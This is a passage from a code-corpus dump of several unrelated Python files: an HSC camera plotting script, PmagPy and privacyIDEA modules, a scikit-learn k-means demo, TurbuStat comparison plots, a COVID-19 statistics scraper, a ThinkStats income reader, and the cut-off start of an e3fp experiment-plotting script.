    percent  : show the mirrored colorbar as a fraction instead of std.
    out      : output image path; defaults to ``camview-<infile>.png``.
    """
    ###########################
    # build the camera
    policy_file = {
        'hsc': os.path.join(os.getenv("OBS_SUBARU_DIR"), "hsc", "hsc_geom.paf"),
        'sc' : os.path.join(os.getenv("OBS_SUBARU_DIR"), "suprimecam", "Full_Suprimecam_geom.paf")
    }
    geomPolicy = afwCGU.getGeomPolicy(policy_file[camera.lower()])
    camera = afwCGU.makeCamera(geomPolicy)
    ###########################
    # load the data
    # data maps ccd id -> {amp id -> value}
    data = {}
    if infile:
        load = numpy.loadtxt(infile)
        vals = load[:,cols[1]]
        for i in range(len(vals)):
            ccd = int(load[i,cols[0]])
            if len(cols) == 3:
                amp = int(load[i,cols[2]])
            else:
                amp = 0
            if ccd not in data:
                data[ccd] = {}
            data[ccd][amp] = vals[i]
    else:
        # No input file: fill every amp with a constant dummy value
        # (0.8 for ccd ids above 103, 1.0 otherwise).
        vals = []
        for r in camera:
            for c in afwCG.cast_Raft(r):
                ccd = afwCG.cast_Ccd(c)
                ccdId = ccd.getId().getSerial()
                data[ccdId] = {}
                val = 1.0
                if ccdId > 103:
                    val = 0.8
                for a in ccd:
                    amp = afwCG.cast_Amp(a)
                    ampId = amp.getId().getSerial() - 1
                    data[ccdId][ampId] = val
                    vals.append(val)
                if len(data[ccdId]) == 0:
                    data[ccdId][0] = val
                    vals.append(val)
    # Color scale: median +/- nsig standard deviations.
    vals = numpy.array(vals)
    mean = vals.mean()
    med  = numpy.median(vals)
    std  = vals.std()
    vmin, vmax = med - nsig*std, med+nsig*std
    ###########################
    # make the plot
    fig = figure.Figure(figsize=(7,7))
    canvas = FigCanvas(fig)
    if infile:
        # Leave room on the right for the colorbar and stats text.
        rect = (0.06, 0.12, 0.76, 0.76)
    else:
        rect = (0.06, 0.06, 0.88, 0.88)
    fpa_fig = hscUtil.FpaFigure(fig, camera, rect=rect)
    for i_ccd, amplist in data.items():
        # CCDs not in the requested set are drawn but zeroed out.
        hide = False
        if ccds and (i_ccd not in ccds):
            hide = True
        ax = fpa_fig.getAxes(i_ccd)
        fpa_fig.highlightAmp(i_ccd, 0)
        # nq = number of quarter rotations of this detector; it decides
        # both the image aspect and which axis an amp maps onto.
        nq = fpa_fig.detectors[i_ccd].getOrientation().getNQuarter()
        nx, ny = 4, 8
        if nq % 2:
            ny, nx = nx, ny
        firstAmp = sorted(amplist.keys())[0]
        im = numpy.zeros((ny, nx)) + amplist[firstAmp]
        print i_ccd
        for amp, val in amplist.items():
            useVal = val
            if hide:
                useVal = 0.0
            # Paint the amp stripe in the orientation-appropriate axis.
            if nq == 0:
                im[:,amp] = useVal
            if nq == 1 or nq == -3:
                im[3-amp,:] = useVal
            if nq == 2:
                im[:,3-amp] = useVal
            if nq == -1 or nq == 3:
                im[amp,:] = useVal
        im_ax = ax.imshow(im, cmap=cmap, vmax=vmax, vmin=vmin, interpolation='nearest')
        fpa_fig.addLabel(i_ccd, [str(i_ccd)], color=textcolor)
    #############################
    # the colorbar
    ylo, yhi = vmin, vmax
    if infile:
        rect = (0.91, 0.25, 0.02, 0.6)
        # real units
        cax = fig.add_axes(rect)
        cax.get_yaxis().get_major_formatter().set_useOffset(False)
        cax.set_ylim([ylo, yhi])
        cax.get_xaxis().set_ticks([])
        cbar = fig.colorbar(im_ax, cax=cax)
        # mirror the values. std or in percent (fractional) if requested
        caxp = cax.twinx()
        caxp.get_xaxis().set_ticks([])
        caxp.get_yaxis().get_major_formatter().set_useOffset(False)
        if percent:
            caxp.set_ylim([(med-ylo)/(yhi-ylo), (yhi-med)/(yhi-ylo)])
        else:
            caxp.set_ylim([-nsig*std, nsig*std])
        for t in cax.get_yticklabels():
            t.set_size('small')
        for t in caxp.get_yticklabels():
            t.set_size("small")
    #################################
    # add stats
    if infile:
        stats = {"Mean":mean, "Med":med, "Std":std, "Max":vals.max(), "Min":vals.min()}
        order = ["Mean", "Med", "Std", "Min", "Max"]
        i = 0
        for k in order:
            v = stats[k]
            ax.text(0.8, 0.03+0.02*i, "%-10s %.3g"%(k+":",v), fontsize=9,
                    horizontalalignment='left', verticalalignment='center', transform=fig.transFigure)
            i += 1
    #################################
    # title and write it
    date = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
    title = "File: %s  Cols: %s  %s" % (infile, ":".join([str(x+1) for x in cols]), date) if infile else ""
    fig.suptitle(title)
    outfile = out if out else "camview-%s.png" % infile
    fig.savefig(outfile)
if __name__ == '__main__':
    # Command-line front end for main(); see main() for parameter meaning.
    parser = argparse.ArgumentParser()
    parser.add_argument("--version", action='version', version="0.0")
    parser.add_argument("infile", type=str, help="")
    parser.add_argument("-C", "--camera", type=str, default="hsc", choices=("hsc","sc","lsst"), help="")
    parser.add_argument("-m", "--cmap", type=str, default="copper",
                        choices=("copper","gray","jet", "prism"), help="")
    parser.add_argument("-d", "--datacols", type=str, default="1:2", help="Columns format='CCD:datavalue'")
    parser.add_argument("-n", "--nsig", type=float, default=3.0, help="N standard devs for cmap")
    parser.add_argument("-p", "--percent", default=False, action='store_true',
                        help="display percent on complementary colorbar")
    parser.add_argument("-c", "--ccds", default=None, help="Ccds to show")
    parser.add_argument("-t", "--textcolor", default='k', help="Color for labels")
    parser.add_argument("-o", "--out", default=None, help="Output plot name")
    args = parser.parse_args()
    # The literal file name 'none' triggers the dummy-value rendering mode.
    infile = None if args.infile == 'none' else args.infile
    # Convert 1-based user columns to 0-based indices.
    cols = [int(x)-1 for x in args.datacols.split(":")]
    ccds=None
    if args.ccds:
        ccds = set([int(x) for x in hscUtil.idSplit(args.ccds)])
    main(infile, ccds=ccds, camera=args.camera, cmap=args.cmap, cols=cols,
         nsig=args.nsig, percent=args.percent, textcolor=args.textcolor, out=args.out)
| gpl-3.0 |
Caoimhinmg/PmagPy | programs/__init__.py | 1 | 1484 | #!/usr/bin/env pythonw
from __future__ import print_function
from __future__ import absolute_import
import sys
from os import path
import pkg_resources
# Determine which matplotlib backend the invoked program wants: the entry
# point's basename (stripped of a ".py" or "_a" suffix) is looked up in the
# per-program environment table.
command = path.split(sys.argv[0])[-1]
from .program_envs import prog_env
if command.endswith(".py"):
    mpl_env = prog_env.get(command[:-3])
elif command.endswith("_a"):
    mpl_env = prog_env.get(command[:-2])
else:
    mpl_env = prog_env.get(command)
import matplotlib
# Select the program's preferred backend, falling back to TkAgg.  This must
# happen before any pyplot import elsewhere in the package.
if mpl_env:
    matplotlib.use(mpl_env)
else:
    matplotlib.use("TKAgg")
# "-v" anywhere on the command line prints the installed pmagpy versions.
if "-v" in sys.argv:
    print("You are running:")
    try:
        print(pkg_resources.get_distribution('pmagpy'))
    except pkg_resources.DistributionNotFound:
        pass
    try:
        print(pkg_resources.get_distribution('pmagpy-cli'))
    except pkg_resources.DistributionNotFound:
        pass
#from . import generic_magic
#from . import sio_magic
#from . import cit_magic
#from . import _2g_bin_magic
#from . import huji_magic
#from . import huji_magic_new
#from . import ldeo_magic
#from . import iodp_srm_magic
#from . import iodp_dscr_magic
#from . import iodp_samples_magic
#from . import pmd_magic
#from . import tdt_magic
#from . import jr6_jr6_magic
#from . import jr6_txt_magic
#from . import bgc_magic
#__all__ = [generic_magic, sio_magic, cit_magic, _2g_bin_magic, huji_magic,
# huji_magic_new, ldeo_magic, iodp_srm_magic, iodp_dscr_magic,
# pmd_magic, tdt_magic, jr6_jr6_magic, jr6_txt_magic, bgc_magic,
# iodp_samples_magic]
| bsd-3-clause |
roxyboy/scikit-learn | examples/cluster/plot_kmeans_assumptions.py | 270 | 2040 | """
====================================
Demonstration of k-means assumptions
====================================
This example is meant to illustrate situations where k-means will produce
unintuitive and possibly unexpected clusters. In the first three plots, the
input data does not conform to some implicit assumption that k-means makes and
undesirable clusters are produced as a result. In the last plot, k-means
returns intuitive clusters despite unevenly sized blobs.
"""
print(__doc__)
# Author: Phil Roth <mr.phil.roth@gmail.com>
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
# 2x2 grid of k-means failure modes on variants of the same blob data.
plt.figure(figsize=(12, 12))
n_samples = 1500
# Fixed seed so the figure is reproducible.
random_state = 170
X, y = make_blobs(n_samples=n_samples, random_state=random_state)
# Incorrect number of clusters
y_pred = KMeans(n_clusters=2, random_state=random_state).fit_predict(X)
plt.subplot(221)
plt.scatter(X[:, 0], X[:, 1], c=y_pred)
plt.title("Incorrect Number of Blobs")
# Anisotropicly distributed data
# A linear shear of the data breaks k-means' isotropic-cluster assumption.
transformation = [[ 0.60834549, -0.63667341], [-0.40887718, 0.85253229]]
X_aniso = np.dot(X, transformation)
y_pred = KMeans(n_clusters=3, random_state=random_state).fit_predict(X_aniso)
plt.subplot(222)
plt.scatter(X_aniso[:, 0], X_aniso[:, 1], c=y_pred)
plt.title("Anisotropicly Distributed Blobs")
# Different variance
X_varied, y_varied = make_blobs(n_samples=n_samples,
                                cluster_std=[1.0, 2.5, 0.5],
                                random_state=random_state)
y_pred = KMeans(n_clusters=3, random_state=random_state).fit_predict(X_varied)
plt.subplot(223)
plt.scatter(X_varied[:, 0], X_varied[:, 1], c=y_pred)
plt.title("Unequal Variance")
# Unevenly sized blobs
# Subsample the three blobs to 500/100/10 points; k-means still copes here.
X_filtered = np.vstack((X[y == 0][:500], X[y == 1][:100], X[y == 2][:10]))
y_pred = KMeans(n_clusters=3, random_state=random_state).fit_predict(X_filtered)
plt.subplot(224)
plt.scatter(X_filtered[:, 0], X_filtered[:, 1], c=y_pred)
plt.title("Unevenly Sized Blobs")
plt.show()
| bsd-3-clause |
jh23453/privacyidea | privacyidea/lib/stats.py | 3 | 5545 | # -*- coding: utf-8 -*-
#
# 2015-07-16 Initial writeup
# (c) Cornelius Kölbel
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
__doc__ = """This module reads audit data and can create statistics from
audit data using pandas.
This module is tested in tests/test_lib_stats.py
"""
import logging
from privacyidea.lib.log import log_with
import datetime
import StringIO
log = logging.getLogger(__name__)
try:
import matplotlib
MATPLOT_READY = True
matplotlib.style.use('ggplot')
matplotlib.use('Agg')
except Exception as exx:
MATPLOT_READY = False
log.warning("If you want to see statistics you need to install python "
"matplotlib.")
customcmap = [(1, 0, 0), (0, 1, 0), (0, 0, 1)]
@log_with(log)
def get_statistics(auditobject, start_time=None, end_time=None):
    """
    Create audit statistics and return a JSON object

    The auditobject is passed from the upper level, usually from the REST API
    as g.auditobject.

    :param auditobject: The audit object
    :type auditobject: Audit Object as defined in auditmodules.base.Audit
    :param start_time: Start of the evaluated time window.  Defaults to
        seven days before now.  The default is computed per call: the
        previous ``datetime.datetime.now()`` default expressions were
        evaluated once at import time, so a long-running server would
        report an ever-staler window.
    :type start_time: datetime.datetime or None
    :param end_time: End of the evaluated time window, defaults to now.
    :type end_time: datetime.datetime or None
    :return: JSON
    """
    # Resolve the time window at call time, not import time.
    if end_time is None:
        end_time = datetime.datetime.now()
    if start_time is None:
        start_time = end_time - datetime.timedelta(days=7)
    result = {}
    df = auditobject.get_dataframe(start_time=start_time, end_time=end_time)
    # authentication successful/fail per user or serial
    for key in ["user", "serial"]:
        result["validate_{0!s}_plot".format(key)] = _get_success_fail(df, key)
    # get simple usage
    for key in ["serial", "action"]:
        result["{0!s}_plot".format(key)] = _get_number_of(df, key)
    # failed authentication requests
    for key in ["user", "serial"]:
        result["validate_failed_{0!s}_plot".format(key)] = _get_fail(df, key)
    result["admin_plot"] = _get_number_of(df, "action", nums=20)
    return result
def _get_success_fail(df, key):
    """Return a base64 data-URI bar chart of success/fail counts per ``key``.

    Only /validate/check requests are considered.  On any error the
    exception text is returned instead of an image URI.
    """
    try:
        output = StringIO.StringIO()
        # Stacked counts of success vs. failure, grouped by user or serial.
        series = df[df.action.isin(["POST /validate/check",
                                    "GET /validate/check"])].groupby([key,
                                                                      'success']).size().unstack()
        fig = series.plot(kind="bar", stacked=True,
                          legend=True,
                          title="Authentications",
                          grid=True,
                          color=customcmap).get_figure()
        fig.savefig(output, format="png")
        o_data = output.getvalue()
        output.close()
        # Python 2 only: base64 via the str codec machinery.
        image_data = o_data.encode("base64")
        image_uri = 'data:image/png;base64,{0!s}'.format(image_data)
    except Exception as exx:
        # Deliberate best-effort: statistics must not break the API call.
        log.info(exx)
        image_uri = "{0!s}".format(exx)
    return image_uri
def _get_fail(df, key):
    """Return a base64 data-URI bar chart of the top-5 failing ``key`` values.

    Only failed /validate/check requests are counted.  On any error the
    exception text is returned instead of an image URI.
    """
    try:
        output = StringIO.StringIO()
        # Five most frequent failing users/serials.
        series = df[(df.success==0)
                    & (df.action.isin(["POST /validate/check",
                                       "GET /validate/check"]))][
            key].value_counts()[:5]
        plot_canvas = matplotlib.pyplot.figure()
        ax = plot_canvas.add_subplot(1,1,1)
        fig = series.plot(ax=ax, kind="bar",
                          colormap="Reds",
                          stacked=False,
                          legend=False,
                          grid=True,
                          title="Failed Authentications").get_figure()
        fig.savefig(output, format="png")
        o_data = output.getvalue()
        output.close()
        # Python 2 only: base64 via the str codec machinery.
        image_data = o_data.encode("base64")
        image_uri = 'data:image/png;base64,{0!s}'.format(image_data)
    except Exception as exx:
        # Deliberate best-effort: statistics must not break the API call.
        log.info(exx)
        image_uri = "{0!s}".format(exx)
    return image_uri
def _get_number_of(df, key, nums=5):
    """
    return a data url image with a single keyed value.
    It plots the "nums" most occurrences of the "key" column in the dataframe.

    :param df: The DataFrame
    :type df: Pandas DataFrame
    :param key: The key, which should be plotted.
    :param nums: how many of the most often values should be plotted
    :return: A data url
    """
    output = StringIO.StringIO()
    output.truncate(0)
    try:
        plot_canvas = matplotlib.pyplot.figure()
        ax = plot_canvas.add_subplot(1, 1, 1)
        # The `nums` most frequent values of the chosen column.
        series = df[key].value_counts()[:nums]
        fig = series.plot(ax=ax, kind="bar", colormap="Blues",
                          legend=False,
                          stacked=False,
                          title="Numbers of {0!s}".format(key),
                          grid=True).get_figure()
        fig.savefig(output, format="png")
        o_data = output.getvalue()
        output.close()
        # Python 2 only: base64 via the str codec machinery.
        image_data = o_data.encode("base64")
        image_uri = 'data:image/png;base64,{0!s}'.format(image_data)
    except Exception as exx:
        # Deliberate best-effort: statistics must not break the API call.
        log.info(exx)
        image_uri = "No data"
    return image_uri
| agpl-3.0 |
keflavich/TurbuStat | turbustat/analysis/comparison_plot.py | 1 | 7136 | # Licensed under an MIT open source license - see LICENSE
import numpy as np
import os
import matplotlib.pyplot as p
from pandas import read_csv
def comparison_plot(path, num_fids=5, verbose=False, obs=False,
statistics=["Wavelet", "MVC", "PSpec", "Bispectrum",
"DeltaVariance", "Genus", "VCS",
"VCS_Density", "VCS_Velocity", "VCA",
"Tsallis", "PCA", "SCF", "Cramer",
"Skewness", "Kurtosis", "Dendrogram_Hist",
"Dendrogram_Num"]):
'''
Requires results converted into csv form!!
This function plots a comparison of the distances between the different
simulations and the fiducial runs. All face combinations are checked for
in the given path. The plots adjust to the available amount of data.
Parameters
----------
path : str
Path to folder containing the HDF5 files with the distance results.
analysis_fcn : function, optional
Function to apply to the time-step data.
verbose : bool, optional
Enables plotting.
cross_compare : bool, optional
Include comparisons between faces.
statistics : list, optional
Statistics to plot. Default is all.
'''
# All possible face combinations
data_files = {"0_0": ["Face 0 to 0"],
"1_1": ["Face 1 to 1"],
"2_2": ["Face 2 to 2"],
"0_1": ["Face 0 to 1"],
"0_2": ["Face 0 to 2"],
"1_2": ["Face 1 to 2"],
"2_1": ["Face 2 to 1"],
"2_0": ["Face 2 to 0"],
"1_0": ["Face 1 to 0"]}
order = ["0_0", "0_1", "0_2", "1_0", "1_1", "1_2", "2_0", "2_1", "2_2"]
if obs:
data_files["0_obs"] = ["Face 0 to Obs"],
data_files["1_obs"] = ["Face 1 to Obs"],
data_files["2_obs"] = ["Face 2 to Obs"],
# Read in the data and match it to one of the face combinations.
for x in os.listdir(path):
if not os.path.isfile(os.path.join(path, x)):
continue
if not x[-3:] == "csv":
continue
for key in data_files.keys():
if key in x:
data = read_csv(os.path.join(path, x))
data_files[key].append(data)
break
# Now delete the keys with no data
for key in data_files.keys():
if len(data_files[key]) == 1:
del data_files[key]
order.remove(key)
if data_files.keys() == []:
print "No csv files found in %s" % (path)
return
for stat in statistics:
# Divide by 2 b/c there should be 2 files for each comparison b/w faces
(fig, ax), shape = _plot_size(len(data_files.keys()))
for k, key in enumerate(order):
bottom = False
if shape[0] % (k + 1) == 0:
bottom = True
_plotter(ax[k], data_files[key][1][stat], data_files[key][2][stat],
num_fids, data_files[key][0], stat, bottom)
ax.reshape(shape)
if verbose:
fig.show()
else:
fig.savefig("distance_comparisons_" + stat + ".pdf")
fig.clf()
def _plot_size(num):
    """Return ``(p.subplots(...), (rows, cols))`` sized for ``num`` panels.

    Up to 3 panels stack in one column; 4-8 split into two columns;
    exactly 9 form a 3x3 grid.  More than 9 is unsupported and returns
    None after printing a message.
    """
    if num <= 3:
        return p.subplots(num, sharex=True), (num, 1)
    elif num > 3 and num <= 8:
        # Round up to fit an odd count into two columns.
        return p.subplots(num), (num / 2 + num % 2, 2)
    elif num == 9:
        return p.subplots(num), (3, 3)
    else:
        print "There should be a maximum of 9 comparisons."
        return
def _plotter(ax, data, fid_data, num_fids, title, stat, bottom):
    """Draw one comparison panel: design distances plus fiducial distances.

    ``data`` holds num_fids consecutive runs of design distances;
    ``fid_data`` holds the fiducial-vs-fiducial distances, packed as the
    upper triangle of the fiducial comparison matrix.
    """
    num_design = (max(data.shape) / num_fids)
    x_vals = np.arange(0, num_design)
    xtick_labels = [str(i) for i in x_vals]
    fid_labels = [str(i) for i in range(num_fids-1)]
    # Plot designs
    # One line per fiducial: its distances to every design.
    # NOTE(review): the legend label says "Fiducial i" for the design
    # curves — presumably meaning "distances to fiducial i"; confirm.
    for i in range(num_fids):
        y_vals = data.ix[int(i * num_design):int(((i + 1) * num_design)-1)]
        ax.plot(x_vals, y_vals, "-o", label="Fiducial " + str(i), alpha=0.6)
    # Set title in upper left hand corner
    ax.annotate(title, xy=(0, 1), xytext=(12, -6), va='top',
                xycoords='axes fraction', textcoords='offset points',
                fontsize=12, alpha=0.75)
    # Set the ylabel using the stat name. Replace underscores
    ax.set_ylabel(stat.replace("_", " ")+"\nDistance", fontsize=10,
                  multialignment='center')
    # If the plot is on the bottom of a column, add labels
    if bottom:
        # Put two 'labels' for the x axis
        ax.annotate("Designs", xy=(0, 0), xytext=(8 * (num_design / 2), -20),
                    va='top', xycoords='axes fraction',
                    textcoords='offset points',
                    fontsize=10)
        ax.annotate("Fiducials", xy=(0, 0), xytext=(20 * (num_design / 2), -20),
                    va='top', xycoords='axes fraction',
                    textcoords='offset points',
                    fontsize=10)
    #Plot fiducials
    # fid_comps = (num_fids**2 + num_fids) / 2
    # Fiducial-vs-fiducial points: row i of the upper triangle holds the
    # comparisons of fiducial i with the later fiducials.
    x_fid_vals = np.arange(num_design, num_design + num_fids)
    prev = 0
    for i, posn in enumerate(np.arange(num_fids - 1, 0, -1)):
        ax.plot(x_fid_vals[:len(x_fid_vals)-i-1],
                fid_data[prev:posn+prev], "ko", alpha=0.6)
        prev += posn
    # Make the legend
    ax.legend(loc="upper right", prop={'size': 10})
    ax.set_xlim([-1, num_design + num_fids + 8])
    ax.set_xticks(np.append(x_vals, x_fid_vals))
    ax.set_xticklabels(xtick_labels+fid_labels, rotation=90, size=10)
def timestep_comparisons(path, verbose=False):
'''
Use pandas built-in plotting to look at the variation across time-steps.
Parameters
----------
path : str
Path to files.
verbose : bool, optional
Enables plotting.
'''
data_files = [os.path.join(path, x) for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))
and x[-2:] == "h5"]
if len(data_files) == 0:
print "The inputed path contains no HDF5 files."
return None
data = [HDFStore(filename) for filename in data_files]
for key in data[0].keys():
for i, dataset in enumerate(data):
# p.subplot(3,3,i)
df = dataset[key].sort(axis=0).sort(axis=1)
df.T.plot(style="D--")
p.legend(prop={'size': 8}, loc="best")
p.title(str(key)[1:])
locs, xlabels = p.xticks(size=8)
p.setp(xlabels, rotation=70)
if verbose:
p.show()
else:
p.savefig(
"timestep_comparisons_" + str(data_files[i][38:-19]) + "_" + str(key[1:]) + ".pdf")
p.close()
def num_fiducials(N):
    '''
    Return the number of fiducials based on the number of lines in the
    comparison file.

    Solves N = n * (n - 1) / 2 for n (i.e. N pairwise comparisons among
    n items) and returns n - 1.

    Parameters
    ----------
    N : int
        Number of rows in the data frame.

    Returns
    -------
    int or str
        The fiducial count, or an error string when N is not a
        triangular number.
    '''
    n = 1
    # Search while n*(n-1)/2 has not exceeded N.  The previous bound
    # (``n < N``) stopped one step too early for small N (e.g. N=1 or
    # N=3 are valid triangular counts but returned the error string).
    while n * (n - 1) <= 2 * N:
        if n * (n - 1) == 2 * N:
            return n - 1
        n += 1
    return "Doesn't factor into an integer value."
| mit |
mobarski/sandbox | covid19/xxx_crawl_data.py | 1 | 1696 | from pprint import pprint
import requests
import re
import json
from math import log
# TESTY: https://ourworldindata.org/coronavirus#testing-for-covid-19
# INNE: https://www.worldometers.info/coronavirus/country/{country}/
def get_stats(country):
    """Scrape the worldometers COVID-19 page for ``country``.

    Extracts the Highcharts ``series`` blocks embedded in the page's
    JavaScript and returns a dict mapping the series name (e.g. 'Cases',
    'Daily Cases') to its list of values, with nulls replaced by 0.
    """
    out = {}
    url = f"https://www.worldometers.info/coronavirus/country/{country}/"
    resp = requests.get(url)
    # Each chart series looks like: series: [{ name: '...', ..., data: [...] }]
    raw = re.findall("(?sm)series:\s+\[\{.+?data:.+?]", resp.text)
    for serie in raw:
        name = re.findall("name:\s*'(.+?)'",serie)[0]
        # The data array is JSON except for JS nulls, which become zeros.
        data = re.findall("data:\s*(\[.+?\])",serie)[0].replace('null','0')
        data = json.loads(data)
        out[name] = data
    return out
if __name__=="__main__":
    # Plot a 10-day moving average of the chosen statistic per country,
    # aligned at the day each country first reached `min_value`.
    from matplotlib import pyplot as plt
    from statistics import *
    plt.rcParams["axes.prop_cycle"] = plt.cycler("color", plt.cm.tab20.colors)
    min_value = 10
    by_country = {}
    min_len = None
    #STAT = 'Deaths'
    #STAT = 'Cases'
    STAT = 'Daily Cases'
    #for country in ['poland','italy','france','germany','turkey','uk','sweden','romania','bulgaria','czech-republic','us','canada']:
    for country in ['poland','italy','france','germany','turkey','uk','sweden','romania','us','canada']:
        stats = get_stats(country)
        #pprint(stats); exit()
        stat = stats[STAT]
        # Keep only days at or above the threshold so curves are aligned.
        stat = [x for x in stat if x>=min_value]
        min_len = min(min_len or len(stat), len(stat))
        by_country[country] = stat
        print(country,len(stat),stat)
    for c in by_country:
        stat = by_country[c]
        #stat = stat[:min_len]
        #stat = [a/b for a,b in zip(stat[1:],stat)]
        # 10-day moving average; drop the final (incomplete) point.
        stat = [mean(stat[i:i+10]) for i in range(len(stat)-10)][:-1]
        plt.plot(range(len(stat)), stat, label=c, linewidth=3)
    plt.yscale('log')
    plt.legend()
    plt.title(f'{STAT.lower()} after {min_value} {STAT.lower()}')
    plt.show()
| mit |
johnmwalters/ThinkStats2 | code/hinc.py | 67 | 1494 | """This file contains code used in "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import numpy as np
import pandas
import thinkplot
import thinkstats2
def Clean(s):
    """Convert a dollar-amount string to a number.

    '$1,000' -> 1000.  The sentinel words 'Under' and 'over' (from range
    labels like 'Under $5,000' / '$250,000 and over') map to 0 and
    numpy.inf; any other non-numeric string yields None.
    """
    stripped = s.lstrip('$').replace(',', '')
    try:
        return int(stripped)
    except ValueError:
        pass
    if s == 'Under':
        return 0
    if s == 'over':
        return np.inf
    return None
def ReadData(filename='hinc06.csv'):
    """Reads filename and returns income bins with cumulative frequencies.

    filename: string

    returns: pandas DataFrame with columns income (upper bin edge),
             freq, cumsum and ps (normalized cumulative frequency)
    """
    data = pandas.read_csv(filename, header=None, skiprows=9)
    cols = data[[0, 1]]
    res = []
    for _, row in cols.iterrows():
        label, freq = row.values
        freq = int(freq.replace(',', ''))
        t = label.split()
        low, high = Clean(t[0]), Clean(t[-1])
        res.append((high, freq))
    df = pandas.DataFrame(res)
    # correct the first range
    # (use .loc instead of chained indexing, which newer pandas rejects)
    df.loc[0, 0] -= 1
    # compute the cumulative sum of the freqs
    df[2] = df[1].cumsum()
    # normalize by the grand total: the last cumulative value, rather than
    # a hard-coded row index, so files with a different row count work
    total = df[2].iloc[-1]
    df[3] = df[2] / total
    # add column names
    df.columns = ['income', 'freq', 'cumsum', 'ps']
    return df
def main():
    """Load the income table and print it to stdout."""
    print(ReadData())
if __name__ == "__main__":
main()
| gpl-3.0 |
keiserlab/e3fp-paper | project/analysis/experiments/make_supp_mat.py | 1 | 11385 | """Create supporting info experimental curves and binding summary table.
Author: Seth Axen
E-mail: seth.axen@gmail.com
"""
import os
import glob
import math
from collections import Counter
from matplotlib import pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
from e3fp_paper.plotting.defaults import DefaultColors
from e3fp_paper.plotting.experiments import data_df_from_file, \
fit_df_from_file, \
plot_experiments, \
plot_schild
from e3fp_paper.plotting.util import add_panel_labels
RESULTS_DIR = "../../experiment_prediction/results"
BINDING_POOL_DATA_FILES = glob.glob(os.path.join(RESULTS_DIR,
"*binding*/*pool*data.txt"))
BINDING_DATA_FILES = [x for x in glob.glob(os.path.join(RESULTS_DIR,
"*binding*/*data.txt"))
if x not in BINDING_POOL_DATA_FILES]
TANGO_POOL_DATA_FILES = glob.glob(os.path.join(RESULTS_DIR,
"*tango*/*pool*data.txt"))
ANTAGONIST_POOL_DATA_FILES = glob.glob(
os.path.join(RESULTS_DIR, "*antagonist*/*pool*data.txt"))
BINDING_STRING_MATCH = {'muscarinic': 'm'}
BINDING_BASENAMES = {'muscarinic': 'fig_s9'}
BINDING_TABLE_FILE = 'table_s7.txt'
TANGO_BASENAME = "fig_s10"
ANTAGONIST_BASENAMES = {"m5": "fig_s11"}
TARGET_NAME_FORMAT = {'m1': r"$M_1$", 'm2': r"$M_2$", 'm3': r"$M_3$",
'm4': r"$M_4$", 'm5': r"$M_5$"}
REF_MOLS = {'Atropine', 'Carbachol', 'Acetylcholine'}
NAME_DF = pd.DataFrame.from_csv(
os.path.join(RESULTS_DIR, "compound_name_map.txt"), sep="\t",
header=-1)
NAME_MAP = {str(k): v for k, v in NAME_DF.to_dict().values()[0].iteritems()}
colors = DefaultColors()
def sort_columns(df, ref_mols=frozenset()):
    """Return *df* with its columns reordered for display.

    Reference molecules (members of *ref_mols*) come first; the rest are
    sorted by the first word of the column name, ties broken by original
    column position.  Returns None if *df* is None.

    Fixes vs. original:
    - the mutable default argument ``{}`` is replaced by ``frozenset()``;
    - the *ref_mols* parameter is actually used (the original ignored it
      and read the module-level REF_MOLS constant instead);
    - ``zip(...)[0]`` (Python-2-only subscripting of a zip object) is
      replaced by a portable comprehension.
    """
    if df is None:
        return None
    col_inds = [i for (i, name)
                in sorted(enumerate(df.columns),
                          key=lambda item: (item[1] not in ref_mols,
                                            item[1].split(' ')[0],
                                            item[0]))]
    return df.iloc[:, col_inds]
def convert_columns_to_type(df, astype=float):
    """Convert the column labels of *df* to *astype* where possible.

    Labels that cannot be converted are kept unchanged.  The frame is
    modified in place and also returned.
    """
    new_labels = []
    for label in df.columns:
        try:
            new_labels.append(astype(label))
        except Exception:
            # Non-numeric label (e.g. a compound name): keep as-is.
            new_labels.append(label)
    df.columns = new_labels
    return df
def read_files(data_files, expect_one=False, sort_cols=True):
    """Load paired ``*_data.txt`` / ``*_fit.txt`` experiment files.

    Parameters
    ----------
    data_files : list of str
        Paths to the ``*_data.txt`` files; the matching fit file name is
        derived from each by replacing the ``_data`` suffix.
    expect_one : bool
        If True, require at most one experiment per target and map each
        target directly to its ``(exp_name, data_df, fit_df)`` tuple;
        otherwise map each target to a list of such tuples.
    sort_cols : bool
        If True, reorder data columns with reference molecules first.

    Returns
    -------
    dict
        ``{target: (exp_name, data_df, fit_df)}`` or
        ``{target: [(exp_name, data_df, fit_df), ...]}``.

    Raises
    ------
    ValueError
        If *expect_one* is True and a target appears more than once.
    """
    exp_prefixes = [x.split('_data')[0] for x in data_files]
    fit_files = [x + "_fit.txt" for x in exp_prefixes]
    target_data_fit = {}
    for prefix, data_file, fit_file in zip(exp_prefixes, data_files,
                                           fit_files):
        # File names look like "<target>_<experiment>_..."
        prefix = os.path.basename(prefix)
        tmp = prefix.split("_")
        target_name = tmp[0]
        try:
            exp_name = tmp[1]
        except IndexError:
            exp_name = ""
        data_df = data_df_from_file(data_file, name_map=NAME_MAP)
        fit_df = fit_df_from_file(fit_file, name_map=NAME_MAP)
        if sort_cols:
            data_df = sort_columns(data_df, ref_mols=REF_MOLS)
        if expect_one:
            # `assert` is stripped under `python -O`; raise explicitly.
            if target_name in target_data_fit:
                raise ValueError(
                    "duplicate target {!r} with expect_one=True".format(
                        target_name))
            target_data_fit[target_name] = (exp_name, data_df, fit_df)
        else:
            target_data_fit.setdefault(target_name, []).append(
                (exp_name, data_df, fit_df))
    return target_data_fit
def count_replicates(data_dfs):
    """Count replicate columns per compound across data frames.

